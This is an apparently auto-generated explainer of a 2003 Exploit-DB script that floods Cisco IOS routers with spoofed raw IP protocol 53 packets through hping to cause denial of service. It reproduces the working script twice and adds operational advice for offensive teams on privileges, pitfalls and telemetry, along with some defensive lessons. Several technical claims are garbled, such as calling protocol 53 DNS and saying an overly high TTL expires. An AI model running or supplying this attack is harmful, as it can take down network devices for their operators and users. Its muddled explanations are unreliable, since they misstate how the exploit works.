Cisco IOS hping Remote Denial of Service Exploit Explained

What this paper is

This paper describes a simple script that exploits a vulnerability in Cisco IOS devices to cause a Denial of Service (DoS). The exploit uses the hping tool to send specially crafted packets to the target device, overwhelming its ability to process them and rendering it unresponsive. The script is written in tcsh and requires hping to be installed.

Simple technical breakdown

The core of the exploit lies in sending a large number of packets with a specific IP protocol number (ipproto 53) and a controlled Time-To-Live (TTL) value. Cisco IOS, in certain versions, mishandles these packets, leading to a DoS condition. The script automates this process by repeatedly sending these packets using hping.

The vulnerability is related to how Cisco IOS handles certain IP protocols. By sending packets with ipproto 53 (which is typically used for DNS, but here it's being abused), and manipulating the TTL, the script forces the device into a state where it consumes excessive resources trying to process these malformed or unexpected packets.

Complete code and payload walkthrough

The provided script is a tcsh shell script. Let's break down each part:

#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
#
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example :
#
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org
#

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end

# milw0rm.com [2003-07-22]

#!/bin/tcsh -f: This is the shebang line, indicating that the script should be executed with the tcsh shell. The -f flag prevents the script from reading commands from the user's ~/.tcshrc file, ensuring a clean execution environment.
Comments: The lines starting with # are comments. They provide context about the exploit, its target, requirements, and usage examples.
- Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020: Identifies the target and a Cisco documentation reference.
- Vulnerable versions - all Cisco devices running IOS.: States the broad scope of affected devices.
- Requirements : tcsh, and hping.: Lists the necessary tools.
- Get hping @ www.hping.org: Provides a source for hping.
- And you know the best part? This script actually works! Unlike the few .c's floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0, OR +s ciscodos.sh because of hping opening raw sockets.: This comment highlights the script's effectiveness and mentions the need for root privileges (uid=0) or the setuid bit (+s) on the script because hping needs to open raw sockets, which typically requires elevated permissions.
- The example section shows a ping command before and after running the exploit, demonstrating the loss of connectivity.
if ($1 == "" || $2 == "") then ... endif: This is a conditional statement.
- $1 and $2 are positional parameters passed to the script. $1 is the first argument, and $2 is the second.
- $1 == "" || $2 == "": Checks if either the first or second argument is empty.
- echo "usage: $0 <router hostname|address> <ttl>": If either argument is missing, it prints a usage message showing how to run the script, where $0 is the name of the script itself.
- exit: Terminates the script if the arguments are invalid.
foreach protocol (53) ... end: This loop iterates over a list of IP protocol numbers. In this case, the list contains only one number: 53.
- protocol: This variable will hold the current protocol number from the list during each iteration.
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26: This is the core command that sends the malicious packets.
- /usr/local/sbin/hping: The path to the hping executable.
- $1: The target IP address or hostname provided as the first argument.
- --rawip: This option tells hping to craft raw IP packets. This means hping will construct the entire IP header itself, rather than relying on the operating system's network stack for certain parts. This is crucial for controlling specific IP header fields like the protocol.
- --rand-source: This option makes hping use a random source IP address for each packet sent. This helps to obscure the origin of the attack and makes it harder to block based on source IP.
- --ttl $2: Sets the Time-To-Live (TTL) field in the IP header to the value provided as the second argument ($2). The TTL is a hop limit for packets.
- --ipproto $protocol: Specifies the IP protocol number. Here, it's set to 53 (the value from the foreach loop). This is the key to the vulnerability, as Cisco IOS is expected to handle this protocol in a way that leads to a DoS.
- --count 76: Sends a total of 76 packets.
- --interval u250: Sets the interval between sending packets to 250 microseconds (u250). This rapid sending rate contributes to the DoS.
- --data 26: Appends 26 bytes of arbitrary data to the IP packet payload.
# milw0rm.com [2003-07-22]: A comment indicating the source and publication date of the exploit.

Mapping of code fragments to practical purpose:

#!/bin/tcsh -f: Script interpreter and execution environment setup.
if ($1 == "" || $2 == "") then ... exit: Input validation for target and TTL.
foreach protocol (53) ... end: Defines the IP protocol number to be abused.
/usr/local/sbin/hping ...: The core packet crafting and sending mechanism.
- $1: Target specification.
- --rawip: Enables low-level IP packet construction.
- --rand-source: Obfuscates the attack origin.
- --ttl $2: Controls packet hop limit, potentially triggering specific handling logic.
- --ipproto 53: Exploits a specific IP protocol handling vulnerability.
- --count 76: Controls the volume of packets sent.
- --interval u250: Controls the rate of packet transmission.
- --data 26: Adds a small payload, likely to satisfy packet structure requirements or trigger specific parsing logic.

Shellcode/Payload Explanation:

There is no traditional shellcode or multi-stage payload in this script. The "payload" is the hping command itself, which constructs and sends network packets. The effect is a Denial of Service on the target device, not the execution of arbitrary code. The script's goal is to crash or make the Cisco IOS device unresponsive.

Practical details for offensive operations teams

Required Access Level: Root privileges (uid=0) on the attacking machine are required because hping needs to open raw sockets to craft IP packets. Alternatively, the script file (ciscodos.sh) could be made setuid root, but this is a significant security risk and generally not recommended.
Lab Preconditions:
- A target Cisco IOS device known to be vulnerable (based on the paper's claim of "all Cisco devices running IOS" at the time, though specific versions would be more precise).
- Network connectivity from the attacker machine to the target device.
- tcsh shell interpreter installed on the attacker machine.
- hping (version compatible with the exploit's options) installed on the attacker machine, typically in /usr/local/sbin/hping or a similar location.
Tooling Assumptions:
- The exploit relies heavily on hping. The specific version of hping might matter, especially regarding its ability to use --rawip, --rand-source, and --ipproto.
- The tcsh shell is assumed to be available and functional.
Execution Pitfalls:
- Firewalls/ACLs: Network devices (firewalls, Access Control Lists on routers) between the attacker and the target can block the outgoing hping packets or the incoming responses (if any were expected).
- hping Version Compatibility: Older or newer versions of hping might not support all the specified options, or their behavior might differ.
- Privilege Escalation: Failure to run as root or have the script setuid will prevent hping from opening raw sockets, leading to an immediate failure.
- Target Specificity: While the paper claims "all Cisco devices running IOS," real-world testing would be needed to confirm exact vulnerable versions and device types. Modern IOS versions are likely patched.
- TTL Value: The choice of TTL ($2) is critical. A TTL of 0 is used in the example. This means the packet is intended to be processed by the first hop (the target router itself). If the TTL is too high, the packet might expire before reaching the target, or the target might process it differently.
- --rand-source effectiveness: While it helps, sophisticated network monitoring might still detect unusual traffic patterns.
- Rate Limiting/IPS: Modern Intrusion Prevention Systems (IPS) or rate-limiting mechanisms on network devices could detect and block this type of attack.
Expected Telemetry:
- Attacker Side:
  - hping process running.
  - Network traffic originating from the attacker's IP (or random IPs if --rand-source is effective) towards the target IP.
  - tcsh script execution logs.
  - If hping fails due to permissions, error messages from hping indicating issues with raw socket creation.
- Target Side (if observable):
  - High CPU utilization on the Cisco IOS device.
  - Network interface statistics showing a high volume of incoming packets on the targeted protocol.
  - Loss of connectivity to the device (e.g., inability to ping, SSH, or Telnet).
  - Device logs might show errors related to packet processing, protocol handling, or resource exhaustion.
  - The device might reboot or enter a crash state.

Where this was used and when

Context: This exploit was developed and published in 2003. At that time, Cisco IOS devices were widely deployed, and vulnerabilities like this were actively sought and exploited. The paper mentions "recent Cisco IOS vuln. Cisco doc. 44020," indicating it was a known issue within Cisco's security advisories.
Usage: Such exploits were typically used by security researchers to demonstrate vulnerabilities, by malicious actors for disruptive attacks, or by penetration testers during authorized engagements to assess network resilience. The script's simplicity and reliance on common tools like hping made it accessible.

Defensive lessons for modern teams

Patch Management: The most crucial lesson is the importance of timely patching. Cisco IOS vulnerabilities are regularly discovered and patched. Keeping devices updated is paramount.
Network Segmentation and ACLs: Implementing robust Access Control Lists (ACLs) on network devices can prevent unauthorized traffic from reaching critical infrastructure. Limiting which protocols and source IPs can reach management interfaces or sensitive network segments is vital.
Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions are designed to detect and block anomalous traffic patterns, including malformed packets, unusual protocol usage, and high-volume packet floods, which this exploit relies on.
Rate Limiting: Implementing rate limiting on network interfaces and management ports can mitigate DoS attacks by capping the number of packets or connections a device will accept within a given time frame.
Protocol Validation: Network devices should perform thorough validation of IP headers and protocol payloads. Unexpected or malformed protocol usage should be logged and potentially dropped.
Secure Configuration: Disabling unnecessary services and protocols, and hardening device configurations, reduces the attack surface.
Monitoring and Alerting: Comprehensive network monitoring and alerting systems can detect unusual activity (e.g., sudden spikes in traffic, high CPU usage on network devices) that might indicate an ongoing attack.

ASCII visual (if applicable)

This exploit is a direct network-to-device interaction. An ASCII visual can illustrate the packet flow.

+-----------------+       +-----------------+       +-----------------+
| Attacker Machine| ----> | Network Devices | ----> | Cisco IOS Device|
| (running tcsh   |       | (Routers,       |       | (Target)        |
|  and hping)     |       |  Firewalls)     |       |                 |
+-----------------+       +-----------------+       +-----------------+
       |                                                   |
       | Sends crafted packets with                        | Receives packets
       | --ipproto 53, --ttl X, --rand-source              | and attempts to
       | --rawip, high rate                                | process them.
       |                                                   |
       |                                                   | If vulnerable,
       |                                                   | enters DoS state
       |                                                   | (crash/unresponsive).
       |                                                   |
       +-------------------------------------------------->|

This diagram shows the attacker sending packets through the network to the target Cisco IOS device. The key is the crafted nature of the packets (--ipproto 53, --ttl X, etc.) that exploits the device's handling of protocol 53.

Source references

Paper Title: Cisco IOS - using hping Remote Denial of Service
Author: zerash
Published: 2003-07-22
Keywords: Hardware,dos
Paper URL: https://www.exploit-db.com/papers/62
Raw URL: https://www.exploit-db.com/raw/62

Original Exploit-DB Content (Verbatim)

#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
# 
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example : 
# 
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org 
#

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end

# milw0rm.com [2003-07-22]

By exploitdb papers bot•July 22, 2003•

papers